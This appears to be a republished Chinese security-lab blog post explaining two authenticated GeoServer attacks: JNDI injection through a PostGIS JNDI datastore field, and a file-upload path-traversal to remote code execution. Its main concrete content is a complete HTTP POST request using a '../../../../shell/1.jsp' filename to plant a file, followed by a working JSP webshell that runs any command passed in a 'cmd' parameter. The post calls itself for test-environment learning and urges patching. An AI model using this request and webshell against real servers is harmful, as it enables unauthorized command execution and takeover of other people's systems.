geoserver漏洞解析以及测试方法

admin 2024年4月22日00:36:44评论16 views字数 2144阅读7分8秒阅读模式

geoserver漏洞解析以及测试方法

相信各位师傅在HVV中,都遇到过geoserver系统,但是一般都是弱口令或者信息泄露、SSRF之类的,拿shell的案例不多,下面分享下geoserver系统后台的两种打法。

geoserver漏洞解析以及测试方法

geoserver漏洞解析以及测试方法

一、后台JNDI 注

测试版本:Version 2.13.3

数据储存—》添加新的数据存储—》PostGIS (JNDI) —》jndiReferenceName *

geoserver漏洞解析以及测试方法    

geoserver漏洞解析以及测试方法

geoserver漏洞解析以及测试方法

使用CB1链,弹个计算器    

geoserver漏洞解析以及测试方法

二、GeoServer后台文件上传致远程代码执行漏洞

测试版本:Version 2.22.2

geoserver漏洞解析以及测试方法    

geoserver漏洞解析以及测试方法

修改相对路径为绝对路径,即可愉快的上传webshell了。    

geoserver漏洞解析以及测试方法

geoserver漏洞解析以及测试方法

我了个去,不解析jsp    

geoserver漏洞解析以及测试方法

geoserver漏洞解析以及测试方法

换war包用tomcat部署

geoserver漏洞解析以及测试方法    

geoserver漏洞解析以及测试方法

geoserver漏洞解析以及测试方法

POST /geoserver/rest/workspaces/nurc/coveragestores/mosaic/file.shp?filename=../../../../shell/1.jsp HTTP/1.1

Host: localhost:8080

Content-Length: 370

sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"        

sec-ch-ua-mobile: ?0

Wicket-FocusedElementId: id39

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36

Content-Type: multipart/form-data; boundary-----WebKitFormBoundaryfoycybhDiQZEqxoy

Accept: application/xml, text/xml, */*; q=0.01

Wicket-Ajax-BaseURL: wicket/bookmarkable/org.geoserver.web.data.store.CoverageStoreEditPage?7&storeName=mosaic&wsName=nurc

X-Requested-With: XMLHttpRequest

Wicket-Ajax: true

sec-ch-ua-platform: "Windows"

Origin: http://localhost:8080

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Sec-Fetch-Dest: empty

Referer: http://localhost:8080/geoserver/web/wicket/bookmarkable/org.geoserver.web.data.store.CoverageStoreEditPage?7&storeName=mosaic&wsName=nurc

Accept-Encoding: gzip, deflate, br

Accept-Language: zh-CN,zh;q=0.9

Cookie:JSESSIONID=52159346772CE228794C0E097A442D9F

Connection: close

<%

    if(request.getParameter("cmd") != null) {

        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();        

        int a = -1;

        byte[] b = new byte[2048];

        out.print("

");

        while((a=in.read(b))!=-1) {

            out.print(new String(b));

        }

        out.print("

");

    }

%>

geoserver漏洞解析以及测试方法

该漏洞虽然已公布部分 poc但仍处于 1day状态,请勿用于违法用途,仅做测试环境交流学习。由于该系统弱口令使用情况较为广泛,建议受影响的用户尽快修复漏洞。    

-=[感·谢·阅·读]=-

关于我们

星网实验室成立(starnetlabs)于2021年10月,是智网安云(武汉)信息技术有限公司旗下安全研究院实验室之一,其成员主要来源于国内一线安全厂商或监管执法机构,多名成员取得CISSP,CISP,PMP,CISAW,PTE等国内网络安全圈行业认证证书,该实验室研究员多次参加国内和省内网络安全攻防比赛取得佳绩。实验室主要研究方向:网络安全攻防竞赛、最前沿的攻防技术,云计算安全、物联网安全等。形成一支结构合理、创新能力强的产学研队伍。星网实验室将持续沉淀前沿安全能力,面向产业输出业蓝军网络安全对抗工具、红队攻击武器平台、蜜网平台、大数据安全管理中心等产品,并持续开放各项核心能力,推动产业安全能力建设。护航各行业数字化变革,守护大数据时代的网络安全是星网实验室的使命。

原文始发于微信公众号(星网实验室):geoserver漏洞解析以及测试方法

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月22日00:36:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   geoserver漏洞解析以及测试方法https://cn-sec.com/archives/2677604.html

发表评论

匿名网友 填写信息